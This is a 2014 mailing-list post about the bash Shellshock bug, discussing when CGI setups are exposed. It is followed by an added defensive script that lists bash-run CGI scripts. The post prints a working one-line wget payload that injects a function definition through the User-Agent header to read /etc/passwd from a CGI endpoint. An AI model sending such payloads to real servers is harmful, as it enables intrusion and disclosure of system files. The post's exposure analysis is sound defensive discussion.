[kwlug-disc] Vulnerability in bash

Khalid Baheyeldin kb at 2bits.com
Thu Sep 25 17:46:23 EDT 2014


On Thu, Sep 25, 2014 at 5:24 PM, Hubert Chathi <hubert at uhoreg.ca> wrote:

> For the bash bug, the only way for it to be remotely exploitable is if you
> are running a server that executes programs using bash in response to
> remote requests.  For example (probably the most common), if your web
> server executes a cgi script using bash.  But if you do not allow cgi
> scripts (e.g. if you are only using PHP, via mod_php), then you should be
> safe.


Correct.

Except that many (including me, and many in the PHP CMS universe) choose
not to run mod_php because of its memory footprint, and opt for FastCGI,
with PHP running as PHP-FPM, and either Apache threaded frontending it or
nginx.

For example, this is from a server we manage (Ubuntu 12.04, and 14.04):

# a2dismod
Your choices are: actions alias auth_basic authn_file authz_default
authz_groupfile authz_host authz_user cgid deflate dir env expires fastcgi
mime reqtimeout rewrite setenvif status

Note the cgid there.

So far, I ran a few scans on unpatched servers, and could not get in,
because there is no cgi script to be exploited.

Here is the example script I tried:

#!/bin/sh

wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://example.com/cgi-bin/test.cgi

-- 
Khalid M. Baheyeldin
2bits.com, Inc.
Fast Reliable Drupal
Drupal optimization, development, customization and consulting.
Simplicity is prerequisite for reliability. --  Edsger W.Dijkstra
Simplicity is the ultimate sophistication. --   Leonardo da Vinci
"For every complex problem, there is an answer that is clear, simple, and
wrong." -- H.L. Mencken
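
An audit sketch for the point made in the message above (exposure depends on whether any CGI script is actually run by bash), added here as an example and not part of the original post. It lists executable files under a CGI directory whose "#!" line resolves to bash; the function names and the directory argument are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): list CGI scripts that bash runs.
# Usage (path is an assumption, use your ScriptAlias target): ./audit.sh /usr/lib/cgi-bin

# True if the interpreter path, after following symlinks, is named "bash".
is_bash() {
    target=$(readlink -f "$1" 2>/dev/null) || return 1
    [ "${target##*/}" = bash ]
}

# Print every executable file under $1 whose "#!" line resolves to bash:
# directly, through "env bash", or through an sh that is a symlink to bash.
bash_cgi_scripts() {
    find "$1" -type f -perm -100 2>/dev/null | sort | while IFS= read -r f; do
        first=$(head -n 1 "$f" 2>/dev/null | tr -d '\000')
        case $first in
            '#!'*) line=${first#'#!'} ;;
            *) continue ;;
        esac
        # Split the shebang into interpreter and first argument.
        read -r interp arg rest <<EOF
$line
EOF
        # "#!/usr/bin/env bash": look the real interpreter up on PATH.
        if [ "${interp##*/}" = env ] && [ -n "$arg" ]; then
            interp=$(command -v "$arg" 2>/dev/null) || interp=
        fi
        if [ -n "$interp" ] && is_bash "$interp"; then
            printf '%s\n' "$f"
        fi
    done
}

# Run the audit only when a directory is given on the command line.
if [ "$#" -gt 0 ]; then
    bash_cgi_scripts "$1"
fi
```

An empty result means no script in that directory names bash as its interpreter. A CGI program in another language that shells out still reaches /bin/sh, which this check does not trace.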